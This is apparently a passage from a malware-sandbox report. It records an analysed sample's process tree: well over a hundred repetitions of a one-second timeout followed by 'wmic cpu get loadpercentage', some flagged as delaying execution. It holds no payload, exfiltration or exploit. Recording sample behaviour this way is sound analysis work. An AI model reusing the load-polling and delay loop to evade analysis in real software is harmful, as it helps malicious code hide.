- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1792
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4124
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4124
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2352
- C:\Windows\system32\cmd.exe
